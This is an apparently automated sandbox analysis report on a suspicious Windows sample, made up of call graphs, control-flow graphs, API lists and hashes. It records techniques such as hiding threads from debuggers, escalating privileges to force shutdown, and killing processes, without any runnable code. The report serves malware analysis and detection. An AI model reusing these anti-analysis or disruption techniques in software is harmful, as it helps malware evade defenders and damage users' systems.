63617->63618 63619 6cb88387 63617->63619 63618->63549 63618->63611 63618->63612 63618->63615 63620 6cd03e00 4 API calls 63629 6cb89120 63620->63629 63621->63620 63622 6cd03e00 4 API calls 63639 6cb8a215 _strlen 63622->63639 63623 6cd03e00 4 API calls 63624 6cb89624 63623->63624 63722 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63624->63722 63625->63549 63625->63622 63630 6cb8e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 63625->63630 63626 6cd05863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63626->63630 63628 6ccf98b0 2 API calls 63628->63630 63629->63623 63630->63549 63630->63626 63630->63628 63631 6cb8f7b1 63630->63631 63632 6cb8ed02 Sleep 63630->63632 63740 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63631->63740 63651 6cb8e8c1 63632->63651 63634 6cb8a9bb 63638 6cd05863 std::_Facet_Register 4 API calls 63634->63638 63635 6cb8a9a4 63637 6cd05863 std::_Facet_Register 4 API calls 63635->63637 63636 6cb8e8dd GetCurrentProcess TerminateProcess 63636->63630 63646 6cb8a953 _Yarn _strlen 63637->63646 63638->63646 63639->63549 63639->63634 63639->63635 63639->63646 63640 6cd03e00 4 API calls 63640->63651 63641 6cb8fbb8 63642 6cb8fbe8 ExitWindowsEx Sleep 63641->63642 63642->63560 63643 6cb8f7c0 63643->63641 63644 6cb8b009 63648 6cd05863 std::_Facet_Register 4 API calls 63644->63648 63645 6cb8aff0 63647 6cd05863 std::_Facet_Register 4 API calls 63645->63647 63646->63559 63646->63644 63646->63645 63649 6cb8afa0 _Yarn 63646->63649 63647->63649 63648->63649 63723 6cd04780 63649->63723 63651->63630 63651->63636 63651->63640 63652 6cb8b059 std::ios_base::_Ios_base_dtor _strlen 63652->63549 63653 6cb8b42c 63652->63653 63654 6cb8b443 63652->63654 63657 6cb8b3da _Yarn _strlen 63652->63657 63655 6cd05863 std::_Facet_Register 4 API calls 63653->63655 63656 6cd05863 std::_Facet_Register 4 API calls 63654->63656 63655->63657 63656->63657 63657->63559 63658 6cb8b79e 63657->63658 63659 6cb8b7b7 63657->63659 63662 6cb8b751 _Yarn 63657->63662 63660 6cd05863 std::_Facet_Register 4 API calls 63658->63660 63661 6cd05863 std::_Facet_Register 4 API calls 63659->63661 63660->63662 63661->63662 63663 6cd04780 104 API calls 63662->63663 63664 6cb8b804 std::ios_base::_Ios_base_dtor _strlen 63663->63664 63664->63549 63665 6cb8bc0f 63664->63665 63666 6cb8bc26 63664->63666 63669 6cb8bbbd _Yarn _strlen 63664->63669 63667 6cd05863 std::_Facet_Register 4 API calls 63665->63667 63668 6cd05863 std::_Facet_Register 4 API calls 63666->63668 63667->63669 63668->63669 63669->63559 63670 6cb8c08e 63669->63670 63671 6cb8c075 63669->63671 63674 6cb8c028 _Yarn 63669->63674 63673 6cd05863 std::_Facet_Register 4 API calls 63670->63673 63672 6cd05863 std::_Facet_Register 4 API calls 63671->63672 63672->63674 63673->63674 63675 6cd04780 104 API calls 63674->63675 63680 6cb8c0db std::ios_base::_Ios_base_dtor _strlen 63675->63680 63676 6cb8c7bc 63679 6cd05863 std::_Facet_Register 4 API calls 63676->63679 63677 6cb8c7a5 63678 6cd05863 std::_Facet_Register 4 API calls 63677->63678 63687 6cb8c753 _Yarn _strlen 63678->63687 63679->63687 63680->63549 63680->63676 63680->63677 63680->63687 63681 6cb8d3ed 63683 6cd05863 std::_Facet_Register 4 API calls 63681->63683 63682 6cb8d406 63684 6cd05863 std::_Facet_Register 4 API calls 63682->63684 63685 6cb8d39a _Yarn 63683->63685 63684->63685 63686 6cd04780 104 API calls 63685->63686 63688 6cb8d458 std::ios_base::_Ios_base_dtor _strlen 63686->63688 63687->63559 63687->63681 63687->63682 63687->63685 63693 6cb8cb2f 63687->63693 63688->63549 63689 6cb8d8bb 63688->63689 63690 6cb8d8a4 63688->63690 63694 6cb8d852 _Yarn _strlen 63688->63694 63692 6cd05863 std::_Facet_Register 4 API calls 63689->63692 63691 6cd05863 std::_Facet_Register 4 API calls 63690->63691 63691->63694 63692->63694 63694->63559 63695 6cb8dccf 63694->63695 63696 6cb8dcb6 63694->63696 63699 6cb8dc69 _Yarn 63694->63699 63698 6cd05863 std::_Facet_Register 4 API calls 63695->63698 63697 6cd05863 std::_Facet_Register 4 API calls 63696->63697 63697->63699 63698->63699 63700 6cd04780 104 API calls 63699->63700 63702 6cb8dd1c std::ios_base::_Ios_base_dtor 63700->63702 63701 6cd03e00 4 API calls 63701->63630 63702->63549 63702->63701 63705 6cd03f66 63703->63705 63704 6cd03ffb OpenServiceA 63704->63705 63705->63704 63706 6cd04042 63705->63706 63706->63599 63711 6ccef003 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63707->63711 63708 6ccf1a40 CloseHandle 63708->63711 63709 6ccf1bac CloseHandle 63709->63711 63710 6cb937cb 63715 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63710->63715 63711->63708 63711->63709 63711->63710 63713 6ccf10d2 CloseHandle 63711->63713 63714 6ccdc310 ReadFile WriteFile WriteFile WriteFile 63711->63714 63751 6ccdb750 63711->63751 63713->63711 63714->63711 63715->63566 63716->63599 63717->63593 63719 6cd03e90 63718->63719 63720 6cd03ed0 WaitForSingleObject CloseHandle CloseHandle 63719->63720 63721 6cd03ec4 63719->63721 63720->63719 63721->63602 63722->63618 63724 6cd047d7 63723->63724 63762 6cd04e10 63724->63762 63726 6cd047e8 63727 6cba6ba0 104 API calls 63726->63727 63737 6cd0480c 63727->63737 63728 6cd04887 63814 6cbce010 67 API calls 63728->63814 63730 6cd048bf std::ios_base::_Ios_base_dtor 63815 6cbce010 67 API calls 63730->63815 63733 6cd04874 63799 6cd049b0 63733->63799 63736 6cd04902 std::ios_base::_Ios_base_dtor 63736->63652 63737->63728 63737->63733 63781 6cd05160 63737->63781 63789 6cbe2590 63737->63789 63738 6cd0487c 63739 6cba7090 77 API calls 63738->63739 63739->63728 63740->63643 63743 6cd04087 std::locale::_Setgloballocale 63741->63743 63742 6cd04195 Process32NextW 63742->63743 63743->63742 63744 6cd040e4 CloseHandle 63743->63744 63745 6cd041c7 63743->63745 63746 6cd04160 Process32FirstW 63743->63746 63744->63743 63745->63572 63746->63743 63747->63589 63748->63609 63750->63571 63752 6ccdb763 _Yarn __wsopen_s std::locale::_Setgloballocale 63751->63752 63753 6ccdc2b0 63752->63753 63755 6ccdb900 CreateFileA 63752->63755 63756 6ccda500 63752->63756 63753->63711 63755->63752 63757 6ccda513 __wsopen_s std::locale::_Setgloballocale 63756->63757 63758 6ccdb0ef WriteFile 63757->63758 63759 6ccdb735 63757->63759 63760 6ccda7f2 WriteFile 63757->63760 63761 6ccdab96 ReadFile 63757->63761 63758->63757 63759->63752 63760->63757 63761->63757 63763 6cd04e45 63762->63763 63764 6cbd2020 52 API calls 63763->63764 63765 6cd04ee6 63764->63765 63766 6cd05863 std::_Facet_Register 4 API calls 63765->63766 63767 6cd04f1e 63766->63767 63768 6cd06147 43 API calls 63767->63768 63769 6cd04f32 63768->63769 63770 6cbd1d90 89 API calls 63769->63770 63771 6cd04fdb 63770->63771 63772 6cd0500c 63771->63772 63816 6cbd2250 30 API calls 63771->63816 63772->63726 63774 6cd05046 63817 6cbd26e0 24 API calls 4 library calls 63774->63817 63776 6cd05058 63818 6cd08199 RaiseException 63776->63818 63778 6cd0506d 63819 6cbce010 67 API calls 63778->63819 63780 6cd0507f 63780->63726 63782 6cd051ad 63781->63782 63820 6cd053c0 63782->63820 63784 6cd051c5 63787 6cd0529c 63784->63787 63838 6cbd2250 30 API calls 63784->63838 63839 6cbd26e0 24 API calls 4 library calls 63784->63839 63840 6cd08199 RaiseException 63784->63840 63787->63737 63790 6cbe25cf 63789->63790 63797 6cbe25e3 63790->63797 63849 6cbd3560 32 API calls std::_Xinvalid_argument 63790->63849 63793 6cbe269e 63794 6cbe26b1 63793->63794 63850 6cbd37e0 32 API calls std::_Xinvalid_argument 63793->63850 63794->63737 63797->63793 63851 6cbd2250 30 API calls 63797->63851 63852 6cbd26e0 24 API calls 4 library calls 63797->63852 63853 6cd08199 RaiseException 63797->63853 63800 6cd049be 63799->63800 63802 6cd049f1 63799->63802 63803 6cbd01f0 64 API calls 63800->63803 63801 6cd04aa3 63801->63738 63802->63801 63854 6cbd2250 30 API calls 63802->63854 63804 6cd049e4 63803->63804 63806 6cd0f938 67 API calls 63804->63806 63806->63802 63807 6cd04ace 63855 6cbd2340 24 API calls 63807->63855 63809 6cd04ade 63856 6cd08199 RaiseException 63809->63856 63811 6cd04ae9 63857 6cbce010 67 API calls 63811->63857 63813 6cd04b42 std::ios_base::_Ios_base_dtor 63813->63738 63814->63730 63815->63736 63816->63774 63817->63776 63818->63778 63819->63780 63821 6cd05428 63820->63821 63822 6cd053fc 63820->63822 63827 6cd05439 63821->63827 63841 6cbd3560 32 API calls std::_Xinvalid_argument 63821->63841 63836 6cd05421 63822->63836 63843 6cbd2250 30 API calls 63822->63843 63825 6cd05608 63844 6cbd2340 24 API calls 63825->63844 63827->63836 63842 6cbd2f60 42 API calls 4 library calls 63827->63842 63828 6cd05617 63845 6cd08199 RaiseException 63828->63845 63832 6cd05647 63847 6cbd2340 24 API calls 63832->63847 63834 6cd0565d 63848 6cd08199 RaiseException 63834->63848 63836->63784 63837 6cd05473 63837->63836 63846 6cbd2250 30 API calls 63837->63846 63838->63784 63839->63784 63840->63784 63841->63827 63842->63837 63843->63825 63844->63828 63845->63837 63846->63832 63847->63834 63848->63836 63849->63797 63850->63794 63851->63797 63852->63797 63853->63797 63854->63807 63855->63809 63856->63811 63857->63813 63858 6cd0dd5f 63859 6cd0dd6b __wsopen_s 63858->63859 63860 6cd0dd72 GetLastError ExitThread 63859->63860 63861 6cd0dd7f 63859->63861 63862 6cd137d2 __Getctype 37 API calls 63861->63862 63863 6cd0dd84 63862->63863 63870 6cd18b86 63863->63870 63867 6cd0dd9b 63876 6cd0dcca 16 API calls 2 library calls 63867->63876 63869 6cd0ddbd 63871 6cd0dd8f 63870->63871 63872 6cd18b98 GetPEB 63870->63872 63871->63867 63875 6cd15b8f 5 API calls std::_Lockit::_Lockit 63871->63875 63872->63871 63873 6cd18bab 63872->63873 63877 6cd15c38 5 API calls std::_Lockit::_Lockit 63873->63877 63875->63867 63876->63869 63877->63871
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: HR^
                                        • API String ID: 4218353326-1341859651
                                        • Opcode ID: 7f32b0540f236de8a72514c8ca1ec0e7bf438b9c40d4a2f3bd2f25b079dff5f2
                                        • Instruction ID: a550441718cfb87c51aa5a970dfe560c04025fd25b7918ac8daf872d3c3d70be
                                        • Opcode Fuzzy Hash: 7f32b0540f236de8a72514c8ca1ec0e7bf438b9c40d4a2f3bd2f25b079dff5f2
                                        • Instruction Fuzzy Hash: 21741671645B828FC728CF28C8D0695B7F3EF95318B1D8A2DC0A68BB55E774B54ACB40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4635 6ccf98b0-6ccf98c2 4636 6ccf98c6-6ccf98f3 FindFirstFileA 4635->4636 4637 6ccf98c4 4635->4637 4638 6ccf991c-6ccf9925 4636->4638 4637->4636 4639 6ccf9927-6ccf992c 4638->4639 4640 6ccf9940-6ccf9945 4638->4640 4641 6ccf992e-6ccf9933 4639->4641 4642 6ccf9900-6ccf991a 4639->4642 4643 6ccf9959-6ccf995e 4640->4643 4644 6ccf9947 4640->4644 4641->4638 4645 6ccf9935-6ccf9939 4641->4645 4642->4638 4643->4638 4647 6ccf9960-6ccf996c 4643->4647 4646 6ccf9949-6ccf9957 FindClose 4644->4646 4645->4646 4646->4638
                                        APIs
                                        • FindFirstFileA.KERNEL32(?,?), ref: 6CCF98CC
                                        • FindClose.KERNEL32(000000FF), ref: 6CCF9949
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: gF:E$hF:E$hF:E
                                        • API String ID: 2295610775-4234190611
                                        • Opcode ID: 07efdb5030e27c4df233a884afca6ae3994e10c7e0b4e184f7b11d53c9f5b5c8
                                        • Instruction ID: a8bbeff124723ccd01b65f971bb429fd44d0c2dfe57ecfe39db09f666c204023
                                        • Opcode Fuzzy Hash: 07efdb5030e27c4df233a884afca6ae3994e10c7e0b4e184f7b11d53c9f5b5c8
                                        • Instruction Fuzzy Hash: 08115B745093819FCB548F28D444A4ABBF0BF85314F568A49E4A8C76A1E330CE89CB42

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4774 6cd04050-6cd04085 CreateToolhelp32Snapshot 4775 6cd040c0-6cd040c9 4774->4775 4776 6cd04110-6cd04115 4775->4776 4777 6cd040cb-6cd040d0 4775->4777 4778 6cd04087-6cd040b1 call 6cd11a25 4776->4778 4779 6cd0411b-6cd04120 4776->4779 4780 6cd040d2-6cd040d7 4777->4780 4781 6cd04148-6cd0414d 4777->4781 4778->4775 4784 6cd04122-6cd04127 4779->4784 4785 6cd04195-6cd041a2 Process32NextW 4779->4785 4782 6cd040dd-6cd040e2 4780->4782 4783 6cd0417f-6cd04190 4780->4783 4786 6cd041bc-6cd041c1 4781->4786 4787 6cd0414f-6cd0417d call 6cd0a740 Process32FirstW 4781->4787 4782->4775 4789 6cd040e4-6cd040ff CloseHandle 4782->4789 4783->4775 4784->4775 4790 6cd04129-6cd04143 4784->4790 4792 6cd041a7-6cd041b7 4785->4792 4786->4775 4794 6cd041c7-6cd041d5 4786->4794 4787->4792 4789->4775 4790->4775 4792->4775
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CD0405E
                                        • CloseHandle.KERNEL32(?), ref: 6CD040EC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3280610774-0
                                        • Opcode ID: 312b251a9cffcd12785069824ae46ab94be43598ca1b7d9efb146461f6c595a3
                                        • Instruction ID: 3bb7685997ff0c7dd791d69c4a825a7433f91809a759f4418e9425462abebf34
                                        • Opcode Fuzzy Hash: 312b251a9cffcd12785069824ae46ab94be43598ca1b7d9efb146461f6c595a3
                                        • Instruction Fuzzy Hash: 38313770648340EFD710DF68D988B4ABBE4EBA9318F104A2EE5A8D77A1D335D8549B43

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4918 6cb83886-6cb8388e 4919 6cb83970-6cb8397d 4918->4919 4920 6cb83894-6cb83896 4918->4920 4921 6cb8397f-6cb83989 4919->4921 4922 6cb839f1-6cb839f8 4919->4922 4920->4919 4923 6cb8389c-6cb838b9 4920->4923 4921->4923 4925 6cb8398f-6cb83994 4921->4925 4926 6cb839fe-6cb83a03 4922->4926 4927 6cb83ab5-6cb83aba 4922->4927 4924 6cb838c0-6cb838c1 4923->4924 4928 6cb8395e 4924->4928 4930 6cb8399a-6cb8399f 4925->4930 4931 6cb83b16-6cb83b18 4925->4931 4932 6cb83a09-6cb83a2f 4926->4932 4933 6cb838d2-6cb838d4 4926->4933 4927->4923 4929 6cb83ac0-6cb83ac7 4927->4929 4935 6cb83960-6cb83964 4928->4935 4929->4924 4936 6cb83acd-6cb83ad6 4929->4936 4937 6cb8383b-6cb83855 call 6ccd18a0 call 6ccd18b0 4930->4937 4938 6cb839a5-6cb839bf 4930->4938 4931->4924 4939 6cb838f8-6cb83955 4932->4939 4940 6cb83a35-6cb83a3a 4932->4940 4934 6cb83957-6cb8395c 4933->4934 4934->4928 4944 6cb8396a 4935->4944 4945 6cb83860-6cb83885 4935->4945 4936->4931 4946 6cb83ad8-6cb83aeb 4936->4946 4937->4945 4947 6cb83a5a-6cb83a5d 4938->4947 4939->4934 4941 6cb83b1d-6cb83b22 4940->4941 4942 6cb83a40-6cb83a57 4940->4942 4953 6cb83b49-6cb83b50 4941->4953 4954 6cb83b24-6cb83b44 4941->4954 4942->4947 4950 6cb83ba1-6cb83bb6 4944->4950 4945->4918 4946->4939 4951 6cb83af1-6cb83af8 4946->4951 4948 6cb83aa9-6cb83ab0 4947->4948 4948->4935 4955 6cb83bc0-6cb83bda call 6ccd18a0 call 6ccd18b0 4950->4955 4957 6cb83afa-6cb83aff 4951->4957 4958 6cb83b62-6cb83b85 4951->4958 4953->4924 4961 6cb83b56-6cb83b5d 4953->4961 4954->4948 4969 6cb83be0-6cb83bfe 4955->4969 4957->4934 4958->4939 4962 6cb83b8b 4958->4962 4961->4935 4962->4950 4972 6cb83e7b 4969->4972 4973 6cb83c04-6cb83c11 4969->4973 4974 6cb83e81-6cb83ee0 call 6cb83750 GetCurrentThread NtSetInformationThread 4972->4974 4975 6cb83ce0-6cb83cea 4973->4975 4976 6cb83c17-6cb83c20 4973->4976 4993 6cb83eea-6cb83f04 call 6ccd18a0 call 6ccd18b0 4974->4993 4977 6cb83d3a-6cb83d3c 4975->4977 4978 6cb83cec-6cb83d0c 4975->4978 4980 6cb83dc5 4976->4980 4981 6cb83c26-6cb83c2d 4976->4981 4983 6cb83d3e-6cb83d45 4977->4983 4984 6cb83d70-6cb83d8d 4977->4984 4982 6cb83d90-6cb83d95 4978->4982 4986 6cb83dc6 4980->4986 4987 6cb83dc3 4981->4987 4988 6cb83c33-6cb83c3a 4981->4988 4990 6cb83dba-6cb83dc1 4982->4990 4991 6cb83d97-6cb83db8 4982->4991 4989 6cb83d50-6cb83d57 4983->4989 4984->4982 4992 6cb83dc8-6cb83dcc 4986->4992 4987->4980 4994 6cb83c40-6cb83c5b 4988->4994 4995 6cb83e26-6cb83e2b 4988->4995 4989->4986 4990->4987 5000 6cb83dd7-6cb83ddc 4990->5000 4991->4980 4992->4969 4999 6cb83dd2 4992->4999 5012 6cb83f75-6cb83fa1 4993->5012 4996 6cb83e1b-6cb83e24 4994->4996 4997 6cb83c7b-6cb83cd0 4995->4997 4998 6cb83e31 4995->4998 4996->4992 5003 6cb83e76-6cb83e79 4996->5003 4997->4989 4998->4955 4999->5003 5004 6cb83dde-6cb83e17 5000->5004 5005 6cb83e36-6cb83e3d 5000->5005 5003->4974 5004->4996 5007 6cb83e5c-6cb83e5f 5005->5007 5008 6cb83e3f-6cb83e5a 5005->5008 5007->4997 5011 6cb83e65-6cb83e69 5007->5011 5008->4996 5011->4992 5011->5003 5016 6cb84020-6cb84026 5012->5016 5017 6cb83fa3-6cb83fa8 5012->5017 5020 6cb8402c-6cb8403c 5016->5020 5021 6cb83f06-6cb83f35 5016->5021 5018 6cb8407c-6cb84081 5017->5018 5019 6cb83fae-6cb83fcf 5017->5019 5022 6cb840aa-6cb840ae 5018->5022 5023 6cb84083-6cb8408a 5018->5023 5019->5022 5025 6cb8403e-6cb84058 5020->5025 5026 6cb840b3-6cb840b8 5020->5026 5024 6cb83f38-6cb83f61 5021->5024 5030 6cb83f6b-6cb83f6f 5022->5030 5023->5024 5027 6cb84090 5023->5027 5029 6cb83f64-6cb83f67 5024->5029 5031 6cb8405a-6cb84063 5025->5031 5026->5019 5028 6cb840be-6cb840c9 5026->5028 5027->4993 5032 6cb840a7 5027->5032 5028->5022 5033 6cb840cb-6cb840d4 5028->5033 5034 6cb83f69 5029->5034 5030->5012 5035 6cb84069-6cb8406c 5031->5035 5036 6cb840f5-6cb8413f 5031->5036 5032->5022 5033->5032 5037 6cb840d6-6cb840f0 5033->5037 5034->5030 5039 6cb84072-6cb84077 5035->5039 5040 6cb84144-6cb8414b 5035->5040 5036->5034 5037->5031 5039->5029 5040->5030
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab6c0be5bc3c17e12b5440386461202f81f427f8a12bf32e48db7d6f7864ce80
                                        • Instruction ID: 7f3a66f75f581e4be8ec6203c56270a475185442d9364799f269fc9fdc62bcd6
                                        • Opcode Fuzzy Hash: ab6c0be5bc3c17e12b5440386461202f81f427f8a12bf32e48db7d6f7864ce80
                                        • Instruction Fuzzy Hash: 8532F732246B818FC324CF28C8D0696B7E3EFD131476A8A6CC0EA5BB55D775B44ACB51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: 8a4bc708c74b00e8473ed24c757d6d6906bf311512d3263109aace7e1cef07ae
                                        • Instruction ID: 41ddbbaffb2d52aae4e5cb0a3a7b8def30628b076a21ba25a71f41fe09144620
                                        • Opcode Fuzzy Hash: 8a4bc708c74b00e8473ed24c757d6d6906bf311512d3263109aace7e1cef07ae
                                        • Instruction Fuzzy Hash: E65102315467818FC320CF28C8907D6B7E3BF95314F6A8A5DC0E61BA91EB75B44ACB91
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: 6cb4472c857973275b9d01e97cf7cb56491d5f7f6d51111227d68a25e3f4be90
                                        • Instruction ID: f755a09ef0c52b731ea9b4605b5288dc260acae8632a1eb9b2aab49b70e27eec
                                        • Opcode Fuzzy Hash: 6cb4472c857973275b9d01e97cf7cb56491d5f7f6d51111227d68a25e3f4be90
                                        • Instruction Fuzzy Hash: C251E4315067818FC320CF28C490795B7E3BF95314F698B1DC0E65BA95EB75B446CB91
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6CB83E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CB83EAA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: e44ce10f176b8ba8fc57d5928b6e95e3a9cfb236138c1ba698ec4fc83862f389
                                        • Instruction ID: d18b27a5017b31a47d0feefddc53a80a64f41b5e11371bf5ac2f5d7c24481f79
                                        • Opcode Fuzzy Hash: e44ce10f176b8ba8fc57d5928b6e95e3a9cfb236138c1ba698ec4fc83862f389
                                        • Instruction Fuzzy Hash: DE312431646B81CFC720CF28C8947C6B7B7AF95314F2A4A1DC0A65BA80EB79B009DB51
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6CB83E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CB83EAA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
